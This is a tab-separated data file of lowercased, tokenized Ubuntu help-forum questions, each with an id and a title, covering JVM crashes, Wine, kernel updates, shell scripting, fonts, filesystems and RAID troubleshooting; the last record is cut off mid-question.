28734	persistent crashing of sun jvm	i 've been experiencing a lot of crashes of the sun jvm on both ubuntu server 10.04.1 and 10.04.2 . the crashes seem to happening at random intervals . sometimes they occur when the server is stressed , other times when there is no load on the server at all . i 'm running a host with four virtual machines using kvm as the virtualisation technology . each of the guests is configured to have 1 gigabyte of memory . the host : law @ gandalf : ~ $ uname -a linux gandalf 2.6.32-27-server # 49-ubuntu smp thu dec 2 02:05:21 utc 2010 x86_64 gnu/linux and each guest : confluence @ lw-confluence : ~ $ uname -a linux lw-confluence 2.6.32-24-server # 43-ubuntu smp thu sep 16 16:05:42 utc 2010 x86_64 gnu/linux on 3 of the guests i am running an instance of tomcat with a single application . i am running : 1 instance of atlassian jira 1 instance of atlassian confluence 1 instance of magnolia cms i have experienced random crashes of the jvm across all three machines . i have experienced these crashes in jvm versions 1.6.0_22 ( 64 bit ) , 1.6.0_24 ( 64 bit ) and 1.6.0_24 ( 32 bit ) . the crash seems to be consistently occurring within a native call to libjvm.so . i believe that it is happening when the jvm requests garbage collection , but i 'm not fully sure of this . i have a sample of some of the crash dumps : on the guest running confluence : http : //pastebin.com/bac9yddr on the guest running jira : http : //pastebin.com/hfc0m9sv i have tried the following thus far : re-installing the jvm updating the jvm from 1.6.0_22 to 1.6.0_24 using a 32-bit jvm instead of the 64 bit version i 'm at a bit of a loss as to what to try next , so any help would be greatly appreciated .
28736	using python applications	i downloaded and installed a python-based application according to this page . how do i use it ?
28738	what new games are available for ubuntu in 2011 ?	i know there have been other questions like `` what native games are available ? '' and they often have issues because they turn into a never-ending list of every game ever released for linux . but i 'd like to know what 's coming out this year . good answers can include : a game that 's coming out in 2011 a linux port being released for games that might be older ( eg trine ) as much information and as many screenshots and links as possible few old games unless they 're doing a major update that changes the game very significantly . one game per answer , add as much information as possible and work with each other to build a catalogue of awesome things to look forward to this year .
28742	crysis 2 demo on wine error	i was trying to install the crysis 2 demo on wine when after extraction it said unable to find a volume for file extraction . please verify that you have proper permissions . and ended the setup there . i have troubled in the past getting angry birds to ran on it too - could n't make angry birds to work on wine
28749	will `` oilrush '' be available for purchase from the software center ?	oilrush is a game with a high-end graphics engine due for release on the linux platform very soon . as a matter of fact , preordering is already possible ! that is why i would like to ask whether it will be available for purchase in the ubuntu software centre . if it will be offered , i would wait until it is available and buy it to support ubuntu . if not , i 'd rather buy it now and save some money .
28754	how to find corrupted files ?	some files on my hard drive are corrupted ( no worries , nothing system-related , just a junk of data files , mp3 etc. ) . i found that out when i tried to burn them all to a dvd , the burning application show a message that it can not read the files as they are corrupted . [ this is probably a drive issue , it had happened me once or twice already ] . i do n't care about recovering them , but i have to determine which ones are corrupted . i can not check by manually opening them all , as there are thousands of them . is there any tricky way to check all the files and list the ones that may cause problems when tried to open ?
28757	for my project in launchpad , how do i send all merge requests to a mailing list ?	i have a project in launchpad with a bzr tree . i want all merge requests against that tree to have notifications set to my developer mailing list . how can i accomplish this ?
28762	ca n't update kernel to 2.6.35.27	when i try to update i get this message , i 'm guessing i 'm missing something here ? filesystem type size used avail use % mounted on /dev/sdb6 ext4 43g 7.7g 33g 20 % / none devtmpfs 1.6g 349k 1.6g 1 % /dev none tmpfs 1.6g 5.9m 1.6g 1 % /dev/shm none tmpfs 1.6g 218k 1.6g 1 % /var/run none tmpfs 1.6g 0 1.6g 0 % /var/lock /dev/sdb2 fuseblk 258g 198g 60g 77 % /media/backup /dev/sda1 fuseblk 321g 175g 146g 55 % /media/media /dev/sdb1 ext4 96m 84m 6.7m 93 % /boot /dev/sdb7 ext4 175g 81g 86g 49 % /home here 's the output : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : linux-image-2.6.35-22-generic 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 5 not fully installed or removed . after this operation , 107mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 282211 files and directories currently installed . ) removing linux-image-2.6.35-22-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 2.6.35-22-generic /boot/vmlinuz-2.6.35-22-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 2.6.35-22-generic /boot/vmlinuz-2.6.35-22-generic /etc/default/grub : 23 : syntax error : newline unexpected run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-2.6.35-22- generic.postrm line 328. dpkg : error processing linux-image-2.6.35-22-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-2.6.35-22-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) here 's the content of etc/default/grub
28769	eye of gnome ( eog ) keyboard shortcuts	does there exists some list of keyboard shortcuts ? i want to know how to turn photos ( and other manipulations ) . i could n't google it .
28772	reliable alert dialogs from the shell	i 'd like to have a message pop up in response to various system events , mostly in order to be able to set reminders for myself from a shell session . there are a few ways to do this ; zenity seems to be the most polished . however , i 've found at least two problems with zenity : messages do not appear on all workspaces . i tried using the gtk option -- screen to control this , but they just appear on the current workspace regardless . so if i am switching workspaces as the message comes up , i will not see it . messages do not appear above all other windows . specifically , if i am using guake , a new zenity message will appear below the guake window and i wo n't be able to see it . i tried a few other apps a while back . both gmessage and xmessage exhibited problem 1 ; gmessage also exhibited problem 2 . i did find that kalarm , which can be scripted from the command line , worked acceptably , but i 'm trying to avoid running the kde stack if possible , and would prefer something lightweight with zenity 's versatility . it seems that it might be possible to arrange for these problems to be resolved by setting the wm_class , but i 'm in a bit over my head there . it might also be possible to make modifications to the window after it launches with a script , but again i 'm not sure where to look for resources on that . update as suggested by @ geirha , i 've looked into using notify-send ( via the package libnotify-bin , which appears to be a client to notify-osd ) . there are numerous problems with this framework , for which i 've filed a few bug reports . i 'm hoping that devilspie can provide workarounds for some or all of these issues , or that there is another notification system which works more reliably .
28779	when i try to minimize windows , they close ?	when i try to minimize windows they close !
28785	gnome-shell logout	the latest version of gnome-shell starts to display ( the top bar appears briefly ) but i then get logged out . this happens when i start it with `` gnome-shell -- replace '' . any idea how to make it behave properly ? laptop is a msi u21 , an0d i run with a 'nomodeset ' startup option . without this option the screen clears to just wallpaper and stays that way . gnome-shell v2.31.5 kernel 2.6.35-27 ( & 28 as well )
28788	how to jump to the end of a 'man ' page	when i open up the manual for a command ( man wget for example ) the manual can be many hundreds of lines long . how can i get : to the end of the manual quickly and back to my terminal prompt ?
28792	sudo access per folder ? is that possible ?	is it possible to give sudo privileges to a user for a specific folder ? e.g i want the user 'dads ' to have sudo access for creating/deleting files in a folder 'virgo ' in /opt
28793	view file metadata in gnome / nautilus	when you right click a file , such as a power point presentation , i expect to be able to see the author of the file and other such metadata . this does not seem to happen in gnome / nautilus . this is standard behaviour in windows . any idea how i can see a files metadata ?
28794	where can i find the latest nightly build of the development version ?	i want to test out a kernel issue and see if it 's corrected in the latest natty release . the last alpha was a little bit ago and i thought there were nightly isos i could try instead , but i ca n't seem to find them .
28799	how to associate hardware volume control to usb speakers ?	my xubuntu system recognizes my speakers , and i can change the mixer settings to make them the active sound device , but no matter what i do , the hardware dial will only affect the onboard sound device . generic-usb 0003:046d:0a19.0003 : input , hidraw1 : usb hid v1.00 device [ logitech logitech z205 ] on usb-0000:00:1d.1-1/input2 updated to reflect the fact that this was xubuntu desktop ( from kubuntu install originally ) where i had this problem . i was able to easily do this from ubuntu natty installation .
28800	ca n't remove ubuntu desktop from dropdown menu on logon screen	i 'm running ubuntu on an eee pc with the netbook interface . i installed ubuntu desktop via aptitude to see how well it works on the eee pc , and after a while i wanted to rid myself of it . so , i purged it using aptitude , but it still shows up as an option in the dropdown menu on the login screen . is there any way i can remove the ubuntu desktop option from the dropdown menu ? it 's not a big deal i guess ... i 'm just curious now how to do it . : )
28801	how to update playonlinux ?	i just installed playonlinux , it says : an updated version of playonlinux is available ( 3.8.11 ) . and nothing more . doing apt-get update does n't offer any updated version of pol . what is the safe / regular way to update playonlinux ?
28802	how do i change the default font to `` ubuntu '' on openoffice.org ?	by default , the openoffice.org font is liberation serif . how do i change this behavior , so that `` ubuntu '' becomes the default font ?
28804	unable to synchronize tomboy notes	i keep getting a `` failed to synchronize '' message on my tomboy notes ( with nothing in the 'details ' section ) . it has been working for months , just stopped working a couple of days ago .
28805	synaptic fails to start from the xubuntu menu	i can run sudo synaptic from the command line and it works fine , but when i try to run syaptic package manager from the menu , it prompts me for my password and tells me the password is incorrect every time .
28806	how to access shared drive connected to airport extreme router ?	i have an external hard drive connected to my airport extreme . i keep my photo and music files on it and can access them from both a mac and a windows xp machine . for some reason i ca n't find , much less connect to , it on my ubuntu 10.10 machine . i can see my router in the `` network '' folder but ca n't seem to find and connect to the shared drive . any help would be greatly appreciated . i am somewhat of a novice with ubuntu and networking . thanks
28812	how to detect webcam ?	i installed cheese , but my webcam does n't work . what should i do ? this is the output of lsusb : bus 007 device 002 : id 0483:2016 sgs thomson microelectronics fingerprint reader bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 005 : id 044e:3012 alps electric co. , ltd bus 003 device 004 : id 044e:3013 alps electric co. , ltd bus 003 device 003 : id 044e:3010 alps electric co. , ltd bluetooth adapter bus 003 device 002 : id 044e:3011 alps electric co. , ltd bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 05ca:1839 ricoh co. , ltd visual communication camera vgp-vcc6 [ r5u870 ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
28822	unable to use tl-wn821n wireless adapter	i got a tp-link usb wireless module - tl-wn821n , using ubuntu 10.04 ( same problems were also seen in 10.10 ) . from everything i 've read online , the usb adapter should work just fine , since the atheros ar9170 driver is built into the kernel . however , when i plug it in , it is detected as a usb device , but there is no wlan associated with it , and basically - nothing happens . am i doing something wrong ? what should i do so that the atheros driver is associated with this device ? btw , on windows it works fine ( with the drivers ) . some logs : $ uname -mr 2.6.32-28-generic i686 $ lsb_release -d description : ubuntu 10.04.2 lts $ lsusb ... ( trimmed ) bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 017 : id 0cf3:7015 atheros communications , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub $ lsmod |grep ar9 ar9170usb 51296 0 ath 7611 1 ar9170usb mac80211 205402 3 ar9170usb , iwl3945 , iwlcore cfg80211 126528 5 ar9170usb , ath , iwl3945 , iwlcore , mac80211 led_class 2864 4 ar9170usb , iwl3945 , iwlcore , sdhci
28823	best way to start learning shell commands in terminal ?	what 's the best way to learn how to use system administration / using shell-commands in the terminal ?
28827	confusion about git ; how to undo ?	i wanted to install some source code that was on git . do n't really know what that means ; i 've never used git before , but i figured it was time to learn so , i first installed git . next i tried to clone the git directory of the software i want to install . i got a message saying `` the authenticity of ( ip ) ca n't be established '' . i went ahead and ended up with another message saying , `` warning , such and such will be added to known hosts . '' i went ahead , and it said something about hanging up on the connection . after searching the internet for a while i realized i did n't need git to install the software but now i have it installed , and have added some host to some file or another . i 'm concerned i 've created some security issues i need to fix . can anyone help me undo what i 've done , or better understand what i 've done . did adding a git project open up my system ? beyond that can anyone tell me how git works . everything i 've found assumes i know stuff that i do n't yet . thanks
28829	sed problem in a bash script	i 'm having a problem using the sed command . i 'm trying to write a bash script that does the following : search for the line that contain : @ then save the line that contained : @ and replace it with new line as in the following : # ! /bin/bash echo `` please enter the ip address of you file '' read ipnumber find=`grep ' : @ ' application.properties` # find the line input= '' connection.url=jdbc\racle\ : thin\ : @ $ ipnumber\:1521\ : billz '' # preparing new line echo `sed `` s/ ' $ { find } '/ ' $ { input } '/g '' application.properties` # replace old with new line the problem is : nothing happens . i 've already tried to use `` $ { find } '' instead of ' $ { find } '
28830	run sql script on remote oracle database	i am trying to run a sql script on remote oracle database . something like this , the shell script contains : sqlplus / @ db i want to add something to this command so that is is able to run a sql script on the database db .
28835	is there going to be a friendly unity settings window ?	currently , as far as i am aware , you need to use the compizconfig settings manager application to play with the unity configuration settings . while this makes sense , from a technical point of view , it requires the user to know about the settings manager , install it , and then find the unity options within it . not very user friendly . is there a user friendly configuration application planned that will offer all the configuration options in an easy-to-use for new people fashion ?
28836	lock and unlock from usb disk ( pendrive )	is there any program for locking and unlocking my ubuntu machine using a flash- drive ? for instance , when i take out the usb flash drive , the computer locks automatically and when i put in the flash drive , the computer unlocks automatically . thank you in advance .
28838	batch normalize audio volume on .ogg-files	are there any simple tools to normalize an .ogg-library of 10'000+ songs so that the volume is the same throughout all songs ? terminal or gui does n't matter , it only need to be simple . one caveat though , i do n't want soft interludes/intermissions and ballads blown out of proportion . preferably the process should find the overall gain of the album ( i have all my cd 's ripped into separate folders ) and normalize the level thereafter .
28839	screen dimmed upon wake after standby	sometimes upon resuming from standby i find my screen brightness dimmed to the lowest setting , even though the indicator says it 's where i left it . if i use my brightness function keys i get the popup notification showing me where i am on the scale , but there is no difference between the brightest and the dimmest . laptop : dell xps m1210 , integrated intel graphics .
28840	anomaly with bash ps1 definition	my root and admin user both have the same .bashrc file . the prompt section of the .bashrc is the following : if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac but the problem is that the admin user and root user have different prompts . admin 's prompt is : admin @ hostname : ~ $ and root 's prompt is root @ hostname : /home # so it seems root is using the `` xterm '' version and admin is not . why does the .bashrc file have this difference in prompts ? how do i get the admin user to also use the xterm version ? how would i test that condition ? if i run echo $ term while running as the admin user i get xterm so as far as i can tell , it should be using the xterm version for the admin user .
28842	speed up banshee 's indexing of files on a device	i 've got an external hard drive with music on it , around 250 albums . to make it work nicely with banshee , i 've created an .is_audio_player file on the device , containing audio_folders=music . every time i plug it in , banshee takes around two minutes to index the thing , slowly building up the library - and being unusably sluggish while doing that . is there , per chance , any way to speed it up ? should i not mount the hard disk as a music player , but add it 's contents to my library ? and , if i do , wo n't that give me lots of annoying x symbols next to the titles , as they ca n't be found sometimes ? what 's the best way to have my library on an external hdd ?
28845	lock a partition to a few folders	i want to have a few folders on a partition whose contents i can freely edit , but outside nothing should be saved . specifically , i want the folders in my home ( documents , music , etc ) on a different partition , but rest of the normally hidden folders remain in the main partition with ubuntu . i can make the files within the home folders save in another partition using fstab binding , but i still ca n't think of how to lock the partition from edits outside those folders . i 'm open to suggestions of alternatives to binding - but please , no symbolic links .
28846	text reverses on remote gnome session	i have two computers running 10.4 . the first machine is a wired desktop with sshd . the second is a wifi connected laptop with the ssh client . when i use my laptop to bring up a remote gnome session to my desktop all the text gets reversed . steps : 1 ) login as a user on the laptop to activate the wifi with a stored key . 2 ) goto a console ctrl-alt-f1 3 ) do a xterm -- :1 to bring up a blank graphic session 4 ) ssh -y user @ desktopmachine gnome-session this shows reversed text and messes up the keyboard so i ca n't type
28847	text editor to edit 4.3 gb plain text file	is there any text editor , which can edit such file ? i 've tried : gedit kate nano vim mcedit without success .
28848	what does the kernel boot parameter `` set acpi_osi=linux '' do ?	i am facing an issue with brightness control in my laptop which has intel hd graphics and ubuntu 10.10 64-bit . so when i searched for a fix i found that a common suggestion is to edit the grub file line , grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' documentation for boot parameter acpi_osi tells : acpi_osi= [ hw , acpi ] modify list of supported os interface strings acpi_osi= '' string1 '' # add string1 -- only one string acpi_osi= '' ! string2 '' # remove built-in string2 acpi_osi= # disable all strings — http : //redsymbol.net/linux_boot_parameters/ i do n't find a reason why this should fix any laptop issue . so could anyone tell me what the kernel boot option acpi_osi=linux do ?
28850	smtp server to deliver all mail to user @ localhost	i 'd like to configure an smtp mta to accept all mail addressed to any domain and deliver it to my local user account . it would be very useful for debugging mail sent in some code i 'm working on . i 'll be running the server locally - no outside world interaction required . to be clear : user @ gmail.com - > delivered to - > cam8001 @ localhost dogs @ live.com - > delivered to - > cam8001 @ localhost anything @ any.domain.co.uk - > delivered to - > cam8001 @ localhost
28855	how do i open up firewall while keeping it safe ?	since i 've installed firestarter i have encountered connectivity issues that are all resolved by disabling the firewall . i 'd prefer to have the firewall running and allow all the traffic i normally use : wired network + wireless network , whichever i 'm connected to , or both ( 1 ) openvpn virtualbox internal network samba ( for accessing shared windows folders and sharing folders to windows ) ( 2 ) bittorrent and everything else i use that i ca n't think of : ) all the above works without a firewall . ( 1 ) i used the firestarter wizard and selected wlan0 as my primary connection , now whenever i plug in a network cable , i lose all connectivity . should i just redo the wizard for eth0 , or will i then lose wlan0 ? ( 2 ) if it makes a difference i 'm sharing a directory that i share between local users using bindfs . see my answer to good and easy way to share files on local machine
28856	why does n't lo/ooo look completely native ?	i am not talking about the win 98 look , but even with the gnome-integration installed buttons look a bit weird and there are sometimes black lines where there should n't be any . why ?
28859	banshee does n't like opening websites	i have come across two bugs ( which will be added to launchpad if it 's not resolved here ) when i open any of the websites in banshee amazon or miro guide as soon as the site is finished loading it crashes banshee . if i play any video local or remote it will show 1 frame maybe 0.5 sec of video then i get a black screen and audio continues in the backgound . specs & details i have a fujitsu amilo 1718 laptop with 2 gig of ram ( original 1 gig ) graphics is provided by ati radeon xpress 200m ( do n't laugh it works with compiz ... .just ) i have a link to the output of banshee -- debug here . do n't have time to read ? here are the highlights : [ 2 warn 11:52:34.814 ] caught an exception - system.argumentnullexception : argument can not be null . then a bit later debug info from gdb : could not attach to process . if your uid matches the uid of the target process , check the setting of /proc/sys/kernel/yama/ptrace_scope , or try again as the root user . for more details , see /etc/sysctl.d/10-ptrace.conf ptrace : operation not permitted . ================================================================= got a sigsegv while executing native code . this usually indicates a fatal error in the mono runtime or one of the native libraries used by your application . ================================================================= aborted not music to my ears as you can expect . the version i am using is 1.9.4 from the daily ppa but these bugs happen in any version of banshee from 1.8.1 and up . so if any one has come across a fix for this problem please share ! ! additional info both vlc and miro work on my system so there is n't a system wide problem with video and i have n't mentioned mono so no trolling it will get voted down . edit 1/2 ok so half way there i added the webkit teams ppa ppa : webkit-team/ppa to my software sources and updated . the result is banshee no longer crashes when opening sites . however its is still unable to play video even after disabling gapless playback as per michaels instructions so halfway there but not the full banana .
28878	ca n't boot into ubuntu after installing windows	recently i reinstalled windows xp on my laptop which also have ubuntu 9.10 installed , but after reinstalling windows i was not able to boot to the ubuntu again . i have the ubuntu 9.10 live cd with me and i tried some of the tutorials i saw online but was not successfully . for example i followed the examples on this site but i could n't make it work . can somebody please help me ?
28880	how do i recover a btrfs filesystem with `` parent transid verify failed '' errors ?	i 've got an external usb disk running btrfs . i use it for backups , and each time i do a backup i take a snapshot . however , it 's giving me this error now : parent transid verify failed on 109973766144 wanted 1823 found 1821 parent transid verify failed on 109973766144 wanted 1823 found 1821 obviously , this is a non-critical disk , but i have a few files on here that are n't available elsewhere . is there any way to recover data from this disk ? maybe by mounting one of the snapshots as root ?
28885	battery indicator error . d-bus	so i installed the detailed battery indicator that was shown on omgubuntu , and it worked fine for a few days . now , every time i login i get this : i tried to go back to the old indicator , but it appears to be a d-bus error . any ideas ? i 'm on ubuntu 11.04 ( yes , i use unity . i 've also tried not using unity in a hope that it had something to do with that and that the error was misleading , but i got the exact same results ) on an asus eee pc , and here is what i get when i run cat /proc/acpi/battery/bat0/info when it 's plugged in : james @ tristan : ~ $ cat /proc/acpi/battery/bat0/info present : yes design capacity : 4400 mah last full capacity : 4266 mah battery technology : rechargeable design voltage : 10800 mv design capacity warning : 10 mah design capacity low : 5 mah cycle count : 0 capacity granularity 1 : 44 mah capacity granularity 2 : 44 mah model number : 1005p serial number : battery type : lion oem info : asus james @ tristan : ~ $ i get the exact same output when i 'm not plugged in as well . *edit : there is no bat1 . i 'm now on 11.04 beta , and i 'm still getting the same error another edit : output of acpitool -b battery # 1 : discharging , 100.0 %
28887	what packages do i need to compile .tex documents using xelatex ?	i 'm aware of the existence of similar threads on this forum . but any of replies mach to my problem . i 'm using ubuntu 10.4 and i had n't problems with fonts till i 've decided to use xelatex instead of latex ( cf http : //tex.stackexchange.com/questions/12347/typesetting-a-document-using-arabic-script/12358 # 12358 ) . the problem is that i 'm not able to compile any .tex document using xelatex , as well as properly display xelatex documentation . as i 've learn thanks to mentioned thread , xelatex uses the fonts availables in general in the system . i was trying yo read fontspec documentation , but it opens in pdf with a lot of white gaps and terminal output ( quite long ) consist mostly of errors . this are just few lines of it : error : missing language pack for 'adobe-japan1 ' mapping error : unknown font tag 'f5.1 ' error ( 24124 ) : no font in show error : unknown font tag 'f5.1' i was trying to compile simple xelatex file : \documentclass { article } \usepackage { fontspec } \setmainfont { linux libertine o } \begin { document } hello world ! \end { document } without succes . this is terminal output of compilation : this is xetex , version 3.1415926-2.2-0.9995.2 ( tex live 2009/debian ) restricted \write18 enabled . entering extended mode ( ./ex.tex latex2e < 2009/09/24 > babel < v3.8l > and hyphenation patterns for english , usenglishmax , dumylang , noh yphenation , polish , loaded . ( /usr/share/texmf-texlive/tex/latex/base/article.cls document class : article 2007/10/19 v1.4h standard latex document class ( /usr/share/texmf-texlive/tex/latex/base/size10.clo ) ) ( /usr/share/texmf-texlive/tex/xelatex/fontspec/fontspec.sty ( /usr/share/texmf-texlive/tex/generic/ifxetex/ifxetex.sty ) ( /usr/share/texmf-texlive/tex/latex/tools/calc.sty ) ( /usr/share/texmf-texlive/tex/latex/xkeyval/xkeyval.sty ( /usr/share/texmf-texlive/tex/generic/xkeyval/xkeyval.tex ( /usr/share/texmf-texlive/tex/generic/xkeyval/keyval.tex ) ) ) ( /usr/share/texmf-texlive/tex/latex/base/fontenc.sty ( /usr/share/texmf-texlive/tex/xelatex/euenc/eu1enc.def ) ( /usr/share/texmf-texlive/tex/xelatex/euenc/eu1lmr.fd ) ) fontspec.cfg loaded . ( /usr/share/texmf-texlive/tex/xelatex/fontspec/fontspec.cfg ) ) kpathsea : invalid fontname `linux libertine o ' , contains ' ' ! font \zf @ basefont= '' linux libertine o '' at 10.0pt not loadable : metric ( tfm ) fi le or installed font not found . \zf @ fontspec ... ntname \zf @ suffix `` at \f @ size pt \unless \ifzf @ icu \zf @ set @ ... l.3 \setmainfont { linux libertine o } ? i ca n't find linux libertine o. searching for otf- by aptitude gives as result : maria @ maria-laptop : /etc/fonts $ aptitude search otf p emdebian-rootfs - emdebian root filesystem support p libotf-bin - a library for handling opentype font - utilities p libotf-dev - a library for handling opentype font - development i libotf0 - a library for handling opentype font - runtime p libotf0-dbg - the libotf libraries and debugging symbols p libpam-dotfile - a pam module which allows users to have more than one password p livecd-rootfs - construction script for the livecd rootfs p makebootfat - utility to create a bootable fat filesystem p otf-ipaexfont - japanese opentype font , ipaexfont ( ipaexgothic/mincho ) p otf-ipaexfont-gothic - japanese opentype font , ipaexfont ( ipaexgothic ) p otf-ipaexfont-mincho - japanese opentype font , ipaexfont ( ipaexmincho ) p otf-ipafont - japanese opentype font set , ipafont p otf-ipafont-gothic - japanese opentype font set , ipa gothic font p otf-ipafont-mincho - japanese opentype font set , ipa mincho font p otf-stix - the scientific and technical information exchange fonts p otf-thai-tlwg - thai fonts in opentype format p otf-yozvox-yozfont - japanese proportional handwriting opentype font p otf2bdf - generate bdf bitmap fonts from opentype outline fonts p robotfindskitten - zen simulation of robot finding kitten so font in question is not just uninstalled , but not available , if i 'm not wrong . does it mean that i lack some repositoires ? i was trying also to apply solution from the thread how do i reinstall default fonts ? , but the result is : maria @ maria-laptop : ~ $ sudo apt-get install msttcorefonts [ sudo ] password for maria : reading package lists ... done building dependency tree reading state information ... done note , selecting ttf-mscorefonts-installer instead of msttcorefonts ttf-mscorefonts-installer is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . maria @ maria-laptop : ~ $ it seems that is not a usual problem for use of xelatex ; nobody in the mentioned thread suggested instalation of anything else than tex live . thanks in advance
28891	how do i setup the look & feel of gnome applications while on kde ?	i guess the title is self descriptive . i just moved to kde but the gnome based apps ( like banshee , emacs , tomboy and others ) simply look terrible .
28892	how can i switch between the cfs and bfs schedulers ?	related to a question on which is better , the cfs or bfs scheduler : where do i find a list of which schedulers are available ? and how do i switch between them ?
28893	how do i replace openoffice 3.2.0 with openoffice 3.3.0 ?	i wanted to install openoffice 3.3.0 , but it was installed alongside openoffice 3.2.0 instead of replacing it how do i upgrade 3.2.0 to 3.3.0 ?
28894	video stutter when using external drive	when using boxee to play video files off of an external western digital 1tb drive formatted ntfs , i notice a slight stutter in the video every 5-10 seconds . when using mplayer , it does n't stutter as often , but it still stutters occasionally . if i play the video off of the local sata drive , it plays fine even in boxee . i use this computer as my htpc and i just switched from windows to linux on it . in windows , i never had any sort of stutter playing movies from the drive . i am using the latest intel graphics drivers ( for the intel gma 950 ) root @ eee-htpc : /home/htpc # grep wd /etc/mtab /dev/sdb1 /mnt/wd2 fuseblk rw , nosuid , nodev , allow_other , blksize=512 0 0 i notice that despite trying to use ntfs or ntfs-3g , ubuntu uses ntfs-fuse which i 've heard is slower . /dev/sdb1 : timing buffered disk reads : 80 mb in 3.07 seconds = 26.08 mb/sec root @ eee-htpc : /mnt/wd2 # dd if=/dev/zero of=./120mb bs=1024 count=120000 root @ eee-htpc : /mnt/wd2 # time mv ./120mb /home/htpc real 0m2.095s user 0m0.016s sys 0m0.736s even though fuse has a reputation for being slow , it should easily be fast enough for playing standard definition video files . so why the video stutter ? edit : the issue seems to be overhead cpu usage from either playing off of a usb device or ntfs/fuse . watching cpu usage with top , local files use 10-40 % cpu . watching the same video on the external formatted ntfs , it spikes to 170 % ( over 100 % because of hyperthreading ) . to me it seems like it must be overhead from the fuse driver , though i do n't know if it has more or less overhead than ntfs-3g . it 's a eeebox b202 that has an atom 270 , so not exactly the most powerful out there . edit2 : i believe the solution would be to use non-fuse drivers or different fuse drivers . so far i have not been able to . edit3 : i 've probably edited this more times than i should , but as an update i have upgraded ntfs drivers to ntfs-3g 2010.8.8 external fuse 28 - third generation ntfs driver using the following ppa - ppa : x3lectric/team-iquik-releases . when first opening a video file in boxee that 's on ntfs there 's still the same amount of lag . after a few minutes of video , the lag seems to go away and the cpu usage comes down to 10-40 % . every so often though , it begins to stutter again . also , if i skip ahead/back in the file , it begins to stutter a lot .
28898	what is suspend ?	i saw the option suspend in ubuntu . what does it do ? i tried this option , but my pc goes to low power mode and then , i ca n't bring it to a normal condition . so i had to power off my pc .
28901	how to configure my virtualbox 's ubuntu ip ?	i ca n't ping my ubuntu on virtualbox ( within another ubuntu ) . i had set my ip using : # ifconfig eth0 192.168.0.2 netmask 255.255.255.0 up but the ping still fails . what 's different when you 're in the virtualbox ?
28903	programming language api sidebar in gedit	im not sure this is an so question or not , but is there a plugin for gedit to enable me to have the api for a particular language open in a sidebar ? im currently working in java , and it would be useful to have a tree type document with the details of the api keywords .
28904	boot to windows option ? similar to bootcamp	i 'm using a wireless keyboard via bluetooth and therefore can not use it in grub , so i have to plug in an usb keyboard everytime i want to boot into windows . afak apple solved this problem by adding adding functions such as `` boot to macosx '' in the boot camp control panel ( imacs come with bluetooth mice and keyboard ) so i was wondering weather it 's possible to tell grub to boot windows next time ( and maybe even tell it from windows to boot linux next time )
28907	opening files in libreoffice logs out and returns to the login screen	i was working with some .pptx presentations , and when i opened a new .pptx file , a tty appeared and the system reloaded back to the ubuntu login screen . since then , every time i open libreoffice impress , the same thing happens . can anyone help with this ?
28910	ca n't launch ubuntu one	could not launch 'ubuntu one' just upgraded from 10.04 -- > 10.10 64-bit . when i try to launch ubuntu one , i get a dialog that says : could not launch 'ubuntu one '' failed to execute child process `` ubuntuone '' ( no such file or directory ) i uninstalled , and reinstalled . i also followed a process outlined here to completely purge . still does n't work . not sure how to trouble shoot this ... i have logged in via the website and added my computer .
28912	software to show amount of data transfer of each process	i am noticing some unusual network data transfer activity . is there any software that can show the amount of network data transfer is process is doing .
28913	did i lose my raid again ?	a little history : 2 years ago i was really excited to find out that mdadm is so powerful that it even can reshape arrays , so you can start with a smaller array and then grow it as you need . i 've bought 3x1tb drives and made a raid-5 . it was fine for a year . then i bought 2x more , and tried to reshape to raid-6 out of 5 drives , and due to some mess with superblock versions , lost all content . had to rebuild it from scratch , but 2tb of data were gone . yesterday i bought 2 more drives , and this time i had everything : properly built array , ups . i 've disabled write intent map , added 2 new drives as spares and run a command to grow array to 7-disks . it started working , but speed was ridiculously slow , ~100kb/sec . after processing first 37mb at such an amazing speed , one of old hdds fails . i properly shutdown the pc and disconnected the failed drive . after bootup it appeared that it recreated the intent map as it was still in mdadm config , so i removed it from config and rebooted again . now all i see is that all mdadm processes deadlock , and do n't do anything . pid user pr ni virt res shr s % cpu % mem time+ command 1937 root 20 0 12992 608 444 d 0 0.1 0:00.00 mdadm 2283 root 20 0 12992 852 704 d 0 0.1 0:00.01 mdadm 2287 root 20 0 0 0 0 d 0 0.0 0:00.01 md0_reshape 2288 root 18 -2 12992 820 676 d 0 0.1 0:00.01 mdadm and all i see in mdstat is : $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid6 sdb1 